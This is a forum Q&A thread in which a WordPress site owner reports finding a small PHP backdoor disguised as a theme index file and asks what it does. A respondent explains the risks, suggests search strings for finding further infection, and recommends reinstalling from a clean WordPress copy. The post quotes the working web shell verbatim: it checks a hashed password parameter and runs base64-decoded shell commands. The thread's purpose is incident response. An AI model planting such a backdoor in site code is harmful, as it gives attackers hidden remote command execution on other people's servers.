Answer the question
In order to leave comments, you need to log in
R
R
RigidStyle2018-12-05 14:59:34
RigidStyle, 2018-12-05 14:59:34
What is this virus, and what is now to be afraid of?
Today I found this thing on a WordPress site:
File address: wp-content/themes/index.php
The file had this code:
<?php
// Silence is golden.
$s=explode(":","6732fc3453c34f00be5bffc4f0dc2bcbdb1fea50:plugin:_lg");$q=$_REQUEST;if (sha1(md5($q[$s[1]]))===$s[0]){if (isset($q[$s[2]])){$l=base64_decode($q[$s[2]]);echo `$l`;}}The first two lines are clear. But the last one was already on line 140. And it’s not clear what it does and where it could crawl through.
The malicious code was deleted, the file was replaced with a normal one. But what is there to fear now? Where could this thing go and what could it do there?
The host's antivirus called it as:
SL-PHP-EVAL_REQUEST-awgh.UNOFFICIAL FOUND
1 answer(s)
@orlov0562
V
Vitaliy Orlov, 2018-12-05 @orlov0562
Fear that there is another backdoor somewhere in another file.
I could get into any file, in your working directory, where you can reach from the script and where you have write permissions.
The best way to clean it up is to download the latest version of WP and transfer only the database, and preferably only WP posts from the database. Demolish everything to zero, and re-upload the latest version of the site. This is not always applicable, but gives the best results. Otherwise, you need to roll over the latest version of the WP files and look for other infected files using the search for files and masks from the infected script, for example "sha1(md5(" or "base64_decode($q"
Similar questions
S
X
XenTerSeO2015-10-18 20:16:23
How dangerous is it to allow users to upload any files to the server?
1Reply
I
I
I
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question